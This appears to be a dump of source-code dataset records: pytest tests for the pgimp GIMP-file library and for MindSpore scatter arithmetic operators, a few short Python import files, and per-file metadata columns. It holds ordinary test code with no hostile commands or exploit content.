src_1 = GimpFile(os.path.join(srcdir, 'file1.xcf'))\
.create('Mask', np.array([[[255, 255, 255], [0, 0, 0]]], dtype=np.uint8))
dst_1 = GimpFile(os.path.join(dstdir, 'file1.xcf')) \
.create('Mask', np.array([[[0, 0, 0], [255, 255, 255]]], dtype=np.uint8))
dst_2 = GimpFile(os.path.join(dstdir, 'file2.xcf')) \
.create('Mask', np.array([[[0, 0, 0], [255, 255, 255]]], dtype=np.uint8))
src_collection = GimpFileCollection([src_1.get_file()])
dst_collection = GimpFileCollection([dst_1.get_file(), dst_2.get_file()])
dst_collection.merge_mask_layer_from(src_collection, 'Mask', MaskForegroundColor.WHITE, timeout_in_seconds=10)
assert np.all(dst_1.layer_to_numpy('Mask') == [[255, 255, 255], [255, 255, 255]])
assert ['Mask'] == dst_1.layer_names()
assert 'Mask' in dst_2.layer_names()
assert np.all(dst_2.layer_to_numpy('Mask') == [[0, 0, 0], [255, 255, 255]])
assert ['Mask'] == dst_2.layer_names()
def test_merge_mask_layer_from_with_mask_not_available_in_files_in_both_collections_and_foreground_color_white():
with TemporaryDirectory('_src') as srcdir, TemporaryDirectory('_dst') as dstdir:
src_1 = GimpFile(os.path.join(srcdir, 'file1.xcf')) \
.create_empty(2, 1, GimpFileType.GRAY)
dst_1 = GimpFile(os.path.join(dstdir, 'file1.xcf')) \
.create_empty(2, 1, GimpFileType.GRAY)
src_collection = GimpFileCollection([src_1.get_file()])
dst_collection = GimpFileCollection([dst_1.get_file()])
dst_collection.merge_mask_layer_from(src_collection, 'Mask', MaskForegroundColor.WHITE, timeout_in_seconds=10)
assert np.all(dst_1.layer_to_numpy('Mask') == [[0], [0]])
assert ['Mask'] == dst_1.layer_names()
def test_merge_mask_layer_from_with_mask_not_available_in_files_in_both_collections_and_foreground_color_black():
with TemporaryDirectory('_src') as srcdir, TemporaryDirectory('_dst') as dstdir:
src_1 = GimpFile(os.path.join(srcdir, 'file1.xcf')) \
.create_empty(2, 1, GimpFileType.GRAY)
dst_1 = GimpFile(os.path.join(dstdir, 'file1.xcf')) \
.create_empty(2, 1, GimpFileType.GRAY)
src_collection = GimpFileCollection([src_1.get_file()])
dst_collection = GimpFileCollection([dst_1.get_file()])
dst_collection.merge_mask_layer_from(src_collection, 'Mask', MaskForegroundColor.BLACK, timeout_in_seconds=10)
assert np.all(dst_1.layer_to_numpy('Mask') == [[255], [255]])
assert ['Mask'] == dst_1.layer_names()
def test_clear_selection():
file_with_selection_original = file.relative_to(__file__, 'test-resources/selection.xcf')
with TempFile('.xcf') as file_with_selection:
shutil.copyfile(file_with_selection_original, file_with_selection)
collection = GimpFileCollection([file_with_selection])
selections_before = _has_selections(collection)
assert selections_before[file_with_selection]
collection.clear_selection(timeout_in_seconds=10)
selections_after = _has_selections(collection)
assert not selections_after[file_with_selection]
def _has_selections(collection):
result = collection.execute_script_and_return_json(
textwrap.dedent(
"""
import gimp
from pgimp.gimp.parameter import get_json, return_json
from pgimp.gimp.file import XcfFile
files = get_json('__files__')
selections = {}
for file in files:
with XcfFile(file, save=True) as image:
selections[file] = not gimp.pdb.gimp_selection_is_empty(image)
return_json(selections)
"""
),
timeout_in_seconds=10
)
return result
def test_remove_layers_by_name():
data = np.array([[0, 255]], dtype=np.uint8)
with TemporaryDirectory('_files') as dir:
file1 = GimpFile(os.path.join(dir, 'file1.xcf')) \
.create('Background', data) \
.add_layer_from_numpy('Layer 1', data) \
.add_layer_from_numpy('Layer 2', data) \
.add_layer_from_numpy('Layer 3', data)
file2 = GimpFile(os.path.join(dir, 'file2.xcf')) \
.create('Background', data) \
.add_layer_from_numpy('Layer 1', data) \
.add_layer_from_numpy('Layer 2', data)
collection = GimpFileCollection([file1.get_file(), file2.get_file()])
collection.remove_layers_by_name(['Layer 1', 'Layer 3'], timeout_in_seconds=10)
assert file1.layer_names() == ['Layer 2', 'Background']
assert file2.layer_names() == ['Layer 2', 'Background']
| 42.084507
| 125
| 0.650602
| 2,950
| 23,904
| 4.969153
| 0.056271
| 0.023399
| 0.040112
| 0.031926
| 0.871615
| 0.85306
| 0.833481
| 0.821543
| 0.814653
| 0.807422
| 0
| 0.024492
| 0.217704
| 23,904
| 567
| 126
| 42.15873
| 0.759412
| 0.003556
| 0
| 0.627566
| 0
| 0
| 0.078469
| 0.025772
| 0
| 0
| 0
| 0
| 0.222874
| 1
| 0.073314
| false
| 0
| 0.032258
| 0
| 0.108504
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9b5316477ce7fd6da19f6364699eb3e0afb2374d
| 87
|
py
|
Python
|
envisage/plugins/ipython_kernel/api.py
|
janvonrickenbach/Envisage_wxPhoenix_py3
|
cf79e5b2a0c3b46898a60b5fe5a2fb580604808b
|
[
"BSD-3-Clause"
] | null | null | null |
envisage/plugins/ipython_kernel/api.py
|
janvonrickenbach/Envisage_wxPhoenix_py3
|
cf79e5b2a0c3b46898a60b5fe5a2fb580604808b
|
[
"BSD-3-Clause"
] | 1
|
2017-05-22T21:15:22.000Z
|
2017-05-22T21:15:22.000Z
|
envisage/plugins/ipython_kernel/api.py
|
janvonrickenbach/Envisage_wxPhoenix_py3
|
cf79e5b2a0c3b46898a60b5fe5a2fb580604808b
|
[
"BSD-3-Clause"
] | 1
|
2019-10-01T07:03:58.000Z
|
2019-10-01T07:03:58.000Z
|
from ipython_kernel_plugin import IPythonKernelPlugin, IPYTHON_KERNEL_PROTOCOL # noqa
| 43.5
| 86
| 0.885057
| 10
| 87
| 7.3
| 0.8
| 0.356164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091954
| 87
| 1
| 87
| 87
| 0.924051
| 0.045977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9b601d1541c40d95e59c43221fab5f52ddc75afd
| 231
|
py
|
Python
|
zvt/recorders/joinquant/overall/__init__.py
|
Evergreen2020/zvt
|
446a2512d716a38a12164b6d4468a6c9de01b986
|
[
"MIT"
] | 6
|
2020-09-03T10:02:00.000Z
|
2021-02-04T02:51:47.000Z
|
zvt/recorders/joinquant/overall/__init__.py
|
Evergreen2020/zvt
|
446a2512d716a38a12164b6d4468a6c9de01b986
|
[
"MIT"
] | 2
|
2019-12-20T13:12:30.000Z
|
2020-01-03T06:24:30.000Z
|
zvt/recorders/joinquant/overall/__init__.py
|
Evergreen2020/zvt
|
446a2512d716a38a12164b6d4468a6c9de01b986
|
[
"MIT"
] | 2
|
2020-07-08T04:15:40.000Z
|
2021-06-08T08:51:31.000Z
|
# -*- coding: utf-8 -*-
from zvt.recorders.joinquant.overall.cross_market_recorder import *
from zvt.recorders.joinquant.overall.margin_trading_recorder import *
from zvt.recorders.joinquant.overall.stock_summary_recorder import *
| 46.2
| 69
| 0.822511
| 30
| 231
| 6.133333
| 0.533333
| 0.11413
| 0.26087
| 0.407609
| 0.673913
| 0.5
| 0.5
| 0
| 0
| 0
| 0
| 0.004673
| 0.073593
| 231
| 4
| 70
| 57.75
| 0.85514
| 0.090909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
32e9f9206385a627a8ad3b33526b3f3d199fd0d3
| 78
|
py
|
Python
|
practice.py
|
dajimmy1120/AvatarGAN
|
be264914223490ee9c23e59ad5a414da1aef4824
|
[
"Apache-2.0"
] | null | null | null |
practice.py
|
dajimmy1120/AvatarGAN
|
be264914223490ee9c23e59ad5a414da1aef4824
|
[
"Apache-2.0"
] | null | null | null |
practice.py
|
dajimmy1120/AvatarGAN
|
be264914223490ee9c23e59ad5a414da1aef4824
|
[
"Apache-2.0"
] | null | null | null |
from keras_segmentation.pretrained import pspnet_101_voc12
pspnet_101_voc12()
| 26
| 58
| 0.897436
| 11
| 78
| 5.909091
| 0.727273
| 0.276923
| 0.430769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136986
| 0.064103
| 78
| 3
| 59
| 26
| 0.753425
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
fd04dad88b99035b710b66d225ec5a6739f0249b
| 25,604
|
py
|
Python
|
tests/st/ops/cpu/test_scatter_arithmetic_op.py
|
PowerOlive/mindspore
|
bda20724a94113cedd12c3ed9083141012da1f15
|
[
"Apache-2.0"
] | 3,200
|
2020-02-17T12:45:41.000Z
|
2022-03-31T20:21:16.000Z
|
tests/st/ops/cpu/test_scatter_arithmetic_op.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 176
|
2020-02-12T02:52:11.000Z
|
2022-03-28T22:15:55.000Z
|
tests/st/ops/cpu/test_scatter_arithmetic_op.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 621
|
2020-03-09T01:31:41.000Z
|
2022-03-30T03:43:19.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import pytest
import mindspore.context as context
import mindspore.nn as nn
from mindspore import Tensor, Parameter
from mindspore.ops import operations as P
context.set_context(mode=context.GRAPH_MODE, device_target="CPU")
class TestScatterAddNet(nn.Cell):
def __init__(self, lock, inputx, indices, updates):
super(TestScatterAddNet, self).__init__()
self.scatter_add = P.ScatterAdd(use_locking=lock)
self.inputx = Parameter(inputx, name="inputx")
self.indices = Parameter(indices, name="indices")
self.updates = Parameter(updates, name="updates")
def construct(self):
out = self.scatter_add(self.inputx, self.indices, self.updates)
return out
def scatter_add_net(inputx, indices, updates):
lock = True
net = TestScatterAddNet(lock, inputx, indices, updates)
return net()
def scatter_add_use_locking_false_net(inputx, indices, updates):
lock = False
net = TestScatterAddNet(lock, inputx, indices, updates)
return net()
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_small_float32():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[6., 8., 10.],
[12., 14., 16.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_input_updated():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
lock = True
net = TestScatterAddNet(lock, inputx, indices, updates)
net()
expected = np.array([[6., 8., 10.],
[12., 14., 16.]])
np.testing.assert_array_almost_equal(net.inputx.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_large_shape_float32():
inputx = Tensor(np.ones((4, 2, 3, 4)).astype(np.float32))
indices = Tensor(np.array([[0, 2], [3, 1]]).astype(np.int32))
updates = Tensor(np.arange(96).reshape((2, 2, 2, 3, 4)).astype(np.float32))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[[[1., 2., 3., 4.],
[5., 6., 7., 8.],
[9., 10., 11., 12.]],
[[13., 14., 15., 16.],
[17., 18., 19., 20.],
[21., 22., 23., 24.]]],
[[[73., 74., 75., 76.],
[77., 78., 79., 80.],
[81., 82., 83., 84.]],
[[85., 86., 87., 88.],
[89., 90., 91., 92.],
[93., 94., 95., 96.]]],
[[[25., 26., 27., 28.],
[29., 30., 31., 32.],
[33., 34., 35., 36.]],
[[37., 38., 39., 40.],
[41., 42., 43., 44.],
[45., 46., 47., 48.]]],
[[[49., 50., 51., 52.],
[53., 54., 55., 56.],
[57., 58., 59., 60.]],
[[61., 62., 63., 64.],
[65., 66., 67., 68.],
[69., 70., 71., 72.]]]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_small_float32_use_locking_false():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([1, 0]).astype(np.int32))
updates = Tensor(np.arange(6).reshape((2, 3)).astype(np.float32))
output = scatter_add_use_locking_false_net(inputx, indices, updates)
expected = np.array([[3., 4., 5.],
[0., 1., 2.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_input_less_than_1_float32():
inputx = Tensor(np.array([[0.214141, 0.415151, 0.51516],
[0.876542, 0.451611, 0.55112],
[0.111244, 0.633333, 0.34444]]).astype(np.float32))
indices = Tensor(np.array([[[1, 0, 2],
[2, 2, 0]],
[[1, 0, 1],
[2, 1, 2]]]).astype(np.int32))
updates = Tensor(np.arange(34, 70).reshape((2, 2, 3, 3)).astype(np.float32))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[141.21414, 144.41515, 147.51517],
[208.87654, 212.45161, 216.55112],
[257.11124, 262.63333, 267.34442]], dtype=np.float32)
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_float16():
inputx = Tensor(np.zeros((2, 3)).astype(np.float16))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float16))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[6., 8., 10.],
[12., 14., 16.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_large_float16():
inputx = Tensor(np.zeros((2, 3, 4)).astype(np.float16))
indices = Tensor(np.array([[0, 0], [1, 1]]).astype(np.int32))
updates = Tensor(np.arange(63, 111).reshape((2, 2, 3, 4)).astype(np.float16))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[[138., 140., 142., 144.],
[146., 148., 150., 152.],
[154., 156., 158., 160.]],
[[186., 188., 190., 192.],
[194., 196., 198., 200.],
[202., 204., 206., 208.]]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_disordered_float16():
inputx = Tensor(np.flip(np.arange(34, 46).reshape(3, 4).astype(np.float16)))
indices = Tensor(np.array([[[0, 1, 2],
[2, 1, 0]],
[[0, 0, 0],
[2, 2, 2]]]).astype(np.int32))
updates = Tensor(np.arange(63, 111).reshape((2, 2, 3, 4)).astype(np.float16))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[464., 468., 472., 476.],
[187., 188., 189., 190.],
[492., 496., 500., 504.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_large_int32():
inputx = Tensor(np.zeros((2, 3, 4)).astype(np.int32))
indices = Tensor(np.array([[0, 0], [1, 1]]).astype(np.int32))
updates = Tensor(np.arange(63, 111).reshape((2, 2, 3, 4)).astype(np.int32))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[[138., 140., 142., 144.],
[146., 148., 150., 152.],
[154., 156., 158., 160.]],
[[186., 188., 190., 192.],
[194., 196., 198., 200.],
[202., 204., 206., 208.]]]).astype(np.int32)
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_disordered_int32():
inputx = Tensor(np.flip(np.arange(34, 46).reshape(3, 4).astype(np.int32)))
indices = Tensor(np.array([[[0, 1, 2],
[2, 1, 0]],
[[0, 0, 0],
[2, 2, 2]]]).astype(np.int32))
updates = Tensor(np.arange(63, 111).reshape((2, 2, 3, 4)).astype(np.int32))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[464., 468., 472., 476.],
[187., 188., 189., 190.],
[492., 496., 500., 504.]]).astype(np.int32)
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
class TestScatterSubNet(nn.Cell):
def __init__(self, lock, inputx, indices, updates):
super(TestScatterSubNet, self).__init__()
self.scatter_sub = P.ScatterSub(use_locking=lock)
self.inputx = Parameter(inputx, name="inputx")
self.indices = Parameter(indices, name="indices")
self.updates = Parameter(updates, name="updates")
def construct(self):
out = self.scatter_sub(self.inputx, self.indices, self.updates)
return out
def scatter_sub_net(inputx, indices, updates):
lock = True
net = TestScatterSubNet(lock, inputx, indices, updates)
return net()
def scatter_sub_use_locking_false_net(inputx, indices, updates):
lock = False
net = TestScatterSubNet(lock, inputx, indices, updates)
return net()
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_sub_input_updated():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
lock = True
net = TestScatterSubNet(lock, inputx, indices, updates)
net()
expected = np.array([[-6., -8., -10.],
[-12., -14., -16.]])
np.testing.assert_array_almost_equal(net.inputx.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_sub_large_shape_float32():
inputx = Tensor(np.ones((4, 2, 3, 4)).astype(np.float32))
indices = Tensor(np.array([[0, 2], [3, 1]]).astype(np.int32))
updates = Tensor(np.arange(96).reshape((2, 2, 2, 3, 4)).astype(np.float32))
output = scatter_sub_net(inputx, indices, updates)
expected = np.array(
[[[[1.0, 0.0, -1.0, -2.0],
[-3.0, -4.0, -5.0, -6.0],
[-7.0, -8.0, -9.0, -10.0]],
[[-11.0, -12.0, -13.0, -14.0],
[-15.0, -16.0, -17.0, -18.0],
[-19.0, -20.0, -21.0, -22.0]]],
[[[-71.0, -72.0, -73.0, -74.0],
[-75.0, -76.0, -77.0, -78.0],
[-79.0, -80.0, -81.0, -82.0]],
[[-83.0, -84.0, -85.0, -86.0],
[-87.0, -88.0, -89.0, -90.0],
[-91.0, -92.0, -93.0, -94.0]]],
[[[-23.0, -24.0, -25.0, -26.0],
[-27.0, -28.0, -29.0, -30.0],
[-31.0, -32.0, -33.0, -34.0]],
[[-35.0, -36.0, -37.0, -38.0],
[-39.0, -40.0, -41.0, -42.0],
[-43.0, -44.0, -45.0, -46.0]]],
[[[-47.0, -48.0, -49.0, -50.0],
[-51.0, -52.0, -53.0, -54.0],
[-55.0, -56.0, -57.0, -58.0]],
[[-59.0, -60.0, -61.0, -62.0],
[-63.0, -64.0, -65.0, -66.0],
[-67.0, -68.0, -69.0, -70.0]]]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_sub_small_float32_use_locking_false():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([1, 0]).astype(np.int32))
updates = Tensor(np.arange(6).reshape((2, 3)).astype(np.float32))
output = scatter_sub_use_locking_false_net(inputx, indices, updates)
expected = np.array([[-3., -4., -5.],
[-0., -1., -2.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
class TestScatterMulNet(nn.Cell):
def __init__(self, lock, inputx, indices, updates):
super(TestScatterMulNet, self).__init__()
self.scatter_mul = P.ScatterMul(use_locking=lock)
self.inputx = Parameter(inputx, name="inputx")
self.indices = Parameter(indices, name="indices")
self.updates = Parameter(updates, name="updates")
def construct(self):
out = self.scatter_mul(self.inputx, self.indices, self.updates)
return out
def scatter_mul_net(inputx, indices, updates):
lock = True
net = TestScatterMulNet(lock, inputx, indices, updates)
return net()
def scatter_mul_use_locking_false_net(inputx, indices, updates):
lock = False
net = TestScatterMulNet(lock, inputx, indices, updates)
return net()
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_mul_input_updated():
inputx = Tensor(np.ones((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
lock = True
net = TestScatterMulNet(lock, inputx, indices, updates)
net()
expected = np.array([[0., 7., 16.],
[27., 40., 55.]])
np.testing.assert_array_almost_equal(net.inputx.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_mul_output_updated_float32():
inputx = Tensor(np.ones((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_mul_net(inputx, indices, updates)
expected = np.array([[0., 7., 16.],
[27., 40., 55.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_mul_small_float32_use_locking_false():
inputx = Tensor(np.ones((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_mul_use_locking_false_net(inputx, indices, updates)
expected = np.array([[0., 7., 16.],
[27., 40., 55.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
class TestScatterDivNet(nn.Cell):
def __init__(self, lock, inputx, indices, updates):
super(TestScatterDivNet, self).__init__()
self.scatter_div = P.ScatterDiv(use_locking=lock)
self.inputx = Parameter(inputx, name="inputx")
self.indices = Parameter(indices, name="indices")
self.updates = Parameter(updates, name="updates")
def construct(self):
out = self.scatter_div(self.inputx, self.indices, self.updates)
return out
def scatter_div_net(inputx, indices, updates):
lock = True
net = TestScatterDivNet(lock, inputx, indices, updates)
return net()
def scatter_div_use_locking_false_net(inputx, indices, updates):
lock = False
net = TestScatterDivNet(lock, inputx, indices, updates)
return net()
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_div_input_updated():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(1, 13).reshape((2, 2, 3)).astype(np.float32))
lock = True
net = TestScatterDivNet(lock, inputx, indices, updates)
net()
expected = np.array([[0., 0., 0.],
[0., 0., 0.]])
np.testing.assert_array_almost_equal(net.inputx.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_div_output_updated_float32():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(1, 13).reshape((2, 2, 3)).astype(np.float32))
output = scatter_div_net(inputx, indices, updates)
expected = np.array([[0., 0., 0.],
[0., 0., 0.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_div_small_float32_use_locking_false():
inputx = Tensor(np.ones((2, 3)).astype(np.float32) * 10)
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.ones(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_div_use_locking_false_net(inputx, indices, updates)
expected = np.array([[10., 10., 10.],
[10., 10., 10.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
class TestScatterMaxNet(nn.Cell):
def __init__(self, lock, inputx, indices, updates):
super(TestScatterMaxNet, self).__init__()
self.scatter_max = P.ScatterMax(use_locking=lock)
self.inputx = Parameter(inputx, name="inputx")
self.indices = Parameter(indices, name="indices")
self.updates = Parameter(updates, name="updates")
def construct(self):
out = self.scatter_max(self.inputx, self.indices, self.updates)
return out
def scatter_max_net(inputx, indices, updates):
lock = True
net = TestScatterMaxNet(lock, inputx, indices, updates)
return net()
def scatter_max_use_locking_false_net(inputx, indices, updates):
lock = False
net = TestScatterMaxNet(lock, inputx, indices, updates)
return net()
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_max_input_updated():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
lock = True
net = TestScatterMaxNet(lock, inputx, indices, updates)
net()
expected = np.array([[6., 7., 8.],
[9., 10., 11.]])
np.testing.assert_array_almost_equal(net.inputx.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_max_output_updated_float32():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_max_net(inputx, indices, updates)
expected = np.array([[6., 7., 8.],
[9., 10., 11.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_max_small_float32_use_locking_false():
inputx = Tensor(np.ones((2, 3)).astype(np.float32) * 10)
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_max_use_locking_false_net(inputx, indices, updates)
expected = np.array([[10., 10., 10.],
[10., 10., 11.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
class TestScatterMinNet(nn.Cell):
def __init__(self, lock, inputx, indices, updates):
super(TestScatterMinNet, self).__init__()
self.scatter_min = P.ScatterMin(use_locking=lock)
self.inputx = Parameter(inputx, name="inputx")
self.indices = Parameter(indices, name="indices")
self.updates = Parameter(updates, name="updates")
def construct(self):
out = self.scatter_min(self.inputx, self.indices, self.updates)
return out
def scatter_min_net(inputx, indices, updates):
lock = True
net = TestScatterMinNet(lock, inputx, indices, updates)
return net()
def scatter_min_use_locking_false_net(inputx, indices, updates):
lock = False
net = TestScatterMinNet(lock, inputx, indices, updates)
return net()
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_min_input_updated():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
lock = True
net = TestScatterMinNet(lock, inputx, indices, updates)
net()
expected = np.array([[0., 0., 0.],
[0., 0., 0.]])
np.testing.assert_array_almost_equal(net.inputx.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_min_output_updated_float32():
inputx = Tensor(np.ones((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_min_net(inputx, indices, updates)
expected = np.array([[0., 1., 1.],
[1., 1., 1.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_min_small_float32_use_locking_false():
inputx = Tensor(np.ones((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_min_use_locking_false_net(inputx, indices, updates)
expected = np.array([[0., 1., 1.],
[1., 1., 1.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
class TestScatterUpdateNet(nn.Cell):
def __init__(self, lock, inputx, indices, updates):
super(TestScatterUpdateNet, self).__init__()
